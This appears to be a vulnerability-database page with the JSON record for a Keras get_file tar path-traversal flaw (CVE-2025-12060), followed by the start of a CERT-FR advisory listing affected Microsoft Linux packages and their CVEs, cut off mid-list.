Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-12060 (GCVE-0-2025-12060)
Vulnerability from cvelistv5 – Published: 2025-10-30 17:10 – Updated: 2025-11-01 03:55- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-12060",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-31T00:00:00+00:00",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-11-01T03:55:52.355Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://github.com/keras-team/keras/",
"defaultStatus": "unaffected",
"packageName": "util",
"product": "Keras",
"programFiles": [
"get_file"
],
"vendor": "Keras",
"versions": [
{
"lessThanOrEqual": "3.11.3",
"status": "affected",
"version": "3.0.0",
"versionType": "semver"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:keras:keras:*:*:*:*:*:*:*:*",
"versionEndIncluding": "3.11.3",
"versionStartIncluding": "3.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "OR"
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Krishna Gudimetla"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "The \u003ccode\u003ekeras.utils.get_file\u003c/code\u003e API in Keras, when used with the \u003ccode\u003eextract=True\u003c/code\u003e option for tar archives, is vulnerable to a path traversal attack. The utility uses Python\u0027s \u003ccode\u003etarfile.extractall\u003c/code\u003e function without the \u003ccode\u003efilter=\"data\"\u003c/code\u003e feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder. This vulnerability is linked to the underlying Python \u003ccode\u003etarfile\u003c/code\u003e weakness, identified as CVE-2025-4517.\u0026nbsp;\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eNote that upgrading Python to one of the versions that fix CVE-2025-4517 (e.g. Python 3.13.4) is not enough. One additionally needs to upgrade Keras to a version with the fix (Keras 3.12).\u003c/span\u003e\u003cbr\u003e"
}
],
"value": "The keras.utils.get_file API in Keras, when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python\u0027s tarfile.extractall function without the filter=\"data\" feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder. This vulnerability is linked to the underlying Python tarfile weakness, identified as CVE-2025-4517.\u00a0Note that upgrading Python to one of the versions that fix CVE-2025-4517 (e.g. Python 3.13.4) is not enough. One additionally needs to upgrade Keras to a version with the fix (Keras 3.12)."
}
],
"impacts": [
{
"capecId": "CAPEC-126",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-126 Path Traversal"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 8.9,
"baseSeverity": "HIGH",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-30T17:10:43.868Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"url": "https://github.com/keras-team/keras/pull/21760"
},
{
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Keras keras.utils.get_file Utility Path Traversal Vulnerability",
"x_generator": {
"engine": "Vulnogram 0.4.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2025-12060",
"datePublished": "2025-10-30T17:10:43.868Z",
"dateReserved": "2025-10-22T10:17:29.108Z",
"dateUpdated": "2025-11-01T03:55:52.355Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-12060\",\"sourceIdentifier\":\"cve-coordination@google.com\",\"published\":\"2025-10-30T17:15:37.520\",\"lastModified\":\"2025-11-04T15:41:56.843\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"The keras.utils.get_file API in Keras, when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python\u0027s tarfile.extractall function without the filter=\\\"data\\\" feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder. This vulnerability is linked to the underlying Python tarfile weakness, identified as CVE-2025-4517.\u00a0Note that upgrading Python to one of the versions that fix CVE-2025-4517 (e.g. Python 3.13.4) is not enough. One additionally needs to upgrade Keras to a version with the fix (Keras 3.12).\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"cve-coordination@google.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.9,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"PRESENT\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"PASSIVE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"HIGH\",\"subAvailabilityImpact\":\"HIGH\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"cve-coordination@google.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"references\":[{\"url\":\"https://github.com/keras-team/keras/pull/21760\",\"source\":\"cve-coordination@google.com\"},{\"url\":\"https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9\",\"source\":\"cve-coordination@google.com\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-12060\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-10-30T17:40:25.218279Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-10-30T17:40:31.853Z\"}}], \"cna\": {\"title\": \"Keras keras.utils.get_file Utility Path Traversal Vulnerability\", \"source\": {\"discovery\": \"UNKNOWN\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"finder\", \"value\": \"Krishna Gudimetla\"}], \"impacts\": [{\"capecId\": \"CAPEC-126\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-126 Path Traversal\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV4_0\": {\"Safety\": \"NOT_DEFINED\", \"version\": \"4.0\", \"Recovery\": \"NOT_DEFINED\", \"baseScore\": 8.9, \"Automatable\": \"NOT_DEFINED\", \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"valueDensity\": \"NOT_DEFINED\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H\", \"providerUrgency\": \"NOT_DEFINED\", \"userInteraction\": \"PASSIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"PRESENT\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"HIGH\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"HIGH\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"HIGH\", \"vulnerabilityResponseEffort\": \"NOT_DEFINED\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"vendor\": \"Keras\", \"product\": \"Keras\", \"versions\": [{\"status\": \"affected\", \"version\": \"3.0.0\", \"versionType\": \"semver\", \"lessThanOrEqual\": \"3.11.3\"}], \"packageName\": \"util\", \"programFiles\": [\"get_file\"], \"collectionURL\": \"https://github.com/keras-team/keras/\", \"defaultStatus\": \"unaffected\"}], \"references\": [{\"url\": \"https://github.com/keras-team/keras/pull/21760\"}, {\"url\": \"https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9\"}], \"x_generator\": {\"engine\": \"Vulnogram 0.4.0\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"The keras.utils.get_file API in Keras, when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python\u0027s tarfile.extractall function without the filter=\\\"data\\\" feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder. This vulnerability is linked to the underlying Python tarfile weakness, identified as CVE-2025-4517.\\u00a0Note that upgrading Python to one of the versions that fix CVE-2025-4517 (e.g. Python 3.13.4) is not enough. One additionally needs to upgrade Keras to a version with the fix (Keras 3.12).\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"The \u003ccode\u003ekeras.utils.get_file\u003c/code\u003e API in Keras, when used with the \u003ccode\u003eextract=True\u003c/code\u003e option for tar archives, is vulnerable to a path traversal attack. The utility uses Python\u0027s \u003ccode\u003etarfile.extractall\u003c/code\u003e function without the \u003ccode\u003efilter=\\\"data\\\"\u003c/code\u003e feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder. This vulnerability is linked to the underlying Python \u003ccode\u003etarfile\u003c/code\u003e weakness, identified as CVE-2025-4517.\u0026nbsp;\u003cspan style=\\\"background-color: rgb(255, 255, 255);\\\"\u003eNote that upgrading Python to one of the versions that fix CVE-2025-4517 (e.g. Python 3.13.4) is not enough. One additionally needs to upgrade Keras to a version with the fix (Keras 3.12).\u003c/span\u003e\u003cbr\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"cpeApplicability\": [{\"nodes\": [{\"negate\": false, \"cpeMatch\": [{\"criteria\": \"cpe:2.3:a:keras:keras:*:*:*:*:*:*:*:*\", \"vulnerable\": true, \"versionEndIncluding\": \"3.11.3\", \"versionStartIncluding\": \"3.0.0\"}], \"operator\": \"OR\"}], \"operator\": \"OR\"}], \"providerMetadata\": {\"orgId\": \"14ed7db2-1595-443d-9d34-6215bf890778\", \"shortName\": \"Google\", \"dateUpdated\": \"2025-10-30T17:10:43.868Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-12060\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-01T03:55:52.355Z\", \"dateReserved\": \"2025-10-22T10:17:29.108Z\", \"assignerOrgId\": \"14ed7db2-1595-443d-9d34-6215bf890778\", \"datePublished\": \"2025-10-30T17:10:43.868Z\", \"assignerShortName\": \"Google\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
CERTFR-2025-AVI-0966
Vulnerability from certfr_avis - Published: 2025-11-05 - Updated: 2025-11-05
De multiples vulnérabilités ont été découvertes dans les produits Microsoft. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
None| Vendor | Product | Description | ||
|---|---|---|---|---|
| Microsoft | N/A | cbl2 golang 1.22.7-5 | ||
| Microsoft | N/A | azl3 golang 1.23.12-1 | ||
| Microsoft | N/A | cbl2 python-tensorboard 2.11.0-3 | ||
| Microsoft | N/A | azl3 moby-engine 25.0.3-13 | ||
| Microsoft | N/A | azl3 python-tensorboard 2.16.2-6 | ||
| Microsoft | N/A | azl3 kernel 6.6.104.2-4 | ||
| Microsoft | N/A | cbl2 msft-golang 1.24.8-1 | ||
| Microsoft | N/A | azl3 gh 2.62.0-9 | ||
| Microsoft | N/A | azl3 frr 9.1.1-3 | ||
| Microsoft | N/A | azl3 xorg-x11-server-Xwayland 24.1.6-2 versions antérieures à 24.1.6-3 | ||
| Microsoft | N/A | cbl2 libcontainers-common 20210626-7 | ||
| Microsoft | N/A | cbl2 moby-engine 24.0.9-18 | ||
| Microsoft | N/A | cbl2 frr 8.5.5-3 | ||
| Microsoft | N/A | azl3 containerized-data-importer 1.57.0-16 | ||
| Microsoft | N/A | azl3 skopeo 1.14.4-6 | ||
| Microsoft | N/A | azl3 tensorflow 2.16.1-9 | ||
| Microsoft | N/A | azl3 keras 3.3.3-4 versions antérieures à 3.3.3-5 | ||
| Microsoft | N/A | cbl2 gcc 11.2.0-8 | ||
| Microsoft | N/A | cbl2 keras 2.11.0-3 | ||
| Microsoft | N/A | azl3 golang 1.25.3-1 | ||
| Microsoft | N/A | cbl2 tensorflow 2.11.1-2 | ||
| Microsoft | N/A | azl3 keras 3.3.3-4 | ||
| Microsoft | N/A | azl3 gcc 13.2.0-7 | ||
| Microsoft | N/A | cbl2 cri-o 1.22.3-16 | ||
| Microsoft | N/A | cbl2 skopeo 1.14.2-12 | ||
| Microsoft | N/A | cbl2 containerized-data-importer 1.55.0-25 | ||
| Microsoft | N/A | cbl2 golang 1.18.8-10 | ||
| Microsoft | N/A | azl3 libcontainers-common 20240213-3 |
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "cbl2 golang 1.22.7-5",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 golang 1.23.12-1",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 python-tensorboard 2.11.0-3",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 moby-engine 25.0.3-13",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 python-tensorboard 2.16.2-6",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 kernel 6.6.104.2-4",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 msft-golang 1.24.8-1",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 gh 2.62.0-9",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 frr 9.1.1-3",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 xorg-x11-server-Xwayland 24.1.6-2 versions ant\u00e9rieures \u00e0 24.1.6-3",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 libcontainers-common 20210626-7",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 moby-engine 24.0.9-18",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 frr 8.5.5-3",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 containerized-data-importer 1.57.0-16",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 skopeo 1.14.4-6",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 tensorflow 2.16.1-9",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 keras 3.3.3-4 versions ant\u00e9rieures \u00e0 3.3.3-5",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 gcc 11.2.0-8",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 keras 2.11.0-3",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 golang 1.25.3-1",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 tensorflow 2.11.1-2",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 keras 3.3.3-4",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 gcc 13.2.0-7",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 cri-o 1.22.3-16",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 skopeo 1.14.2-12",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 containerized-data-importer 1.55.0-25",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "cbl2 golang 1.18.8-10",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 libcontainers-common 20240213-3",
"product": {
"name": "N/A",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-58183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58183"
},
{
"name": "CVE-2025-40100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40100"
},
{
"name": "CVE-2025-40103",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40103"
},
{
"name": "CVE-2025-61102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61102"
},
{
"name": "CVE-2025-58185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58185"
},
{
"name": "CVE-2025-40092",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40092"
},
{
"name": "CVE-2025-61106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61106"
},
{
"name": "CVE-2025-61103",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61103"
},
{
"name": "CVE-2025-62230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62230"
},
{
"name": "CVE-2025-40104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40104"
},
{
"name": "CVE-2025-40097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40097"
},
{
"name": "CVE-2025-40106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40106"
},
{
"name": "CVE-2025-58188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58188"
},
{
"name": "CVE-2025-40088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40088"
},
{
"name": "CVE-2025-40085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40085"
},
{
"name": "CVE-2025-61724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61724"
},
{
"name": "CVE-2025-61105",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61105"
},
{
"name": "CVE-2025-61723",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61723"
},
{
"name": "CVE-2025-40084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40084"
},
{
"name": "CVE-2025-61725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61725"
},
{
"name": "CVE-2025-47912",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47912"
},
{
"name": "CVE-2025-40095",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40095"
},
{
"name": "CVE-2025-58186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58186"
},
{
"name": "CVE-2025-40105",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40105"
},
{
"name": "CVE-2025-62229",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62229"
},
{
"name": "CVE-2025-58187",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58187"
},
{
"name": "CVE-2025-40083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40083"
},
{
"name": "CVE-2025-62231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62231"
},
{
"name": "CVE-2025-40099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40099"
},
{
"name": "CVE-2025-12060",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12060"
},
{
"name": "CVE-2025-58189",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58189"
},
{
"name": "CVE-2025-40094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40094"
},
{
"name": "CVE-2025-40102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40102"
},
{
"name": "CVE-2025-12058",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12058"
},
{
"name": "CVE-2025-61101",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61101"
},
{
"name": "CVE-2025-61107",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61107"
},
{
"name": "CVE-2025-61100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61100"
},
{
"name": "CVE-2025-40096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40096"
},
{
"name": "CVE-2025-61104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61104"
},
{
"name": "CVE-2025-40087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40087"
}
],
"initial_release_date": "2025-11-05T00:00:00",
"last_revision_date": "2025-11-05T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0966",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-11-05T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits Microsoft. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Microsoft",
"vendor_advisories": [
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-58189",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58189"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40099",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40099"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40083",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40083"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-58186",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58186"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61724",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61724"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61103",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61103"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-12058",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-12058"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40087",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40087"
},
{
"published_at": "2025-11-02",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61100",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61100"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61105",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61105"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-62229",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62229"
},
{
"published_at": "2025-11-01",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40106",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40106"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-62231",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62231"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61102",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61102"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40097",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40097"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40100",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40100"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40084",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40084"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-58187",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58187"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40094",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40094"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-61106",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-61106"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40104",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40104"
},
{
"published_at": "2025-10-31",
"title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2025-40103",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40103"
},
{
"published_at": "2025-11-02",
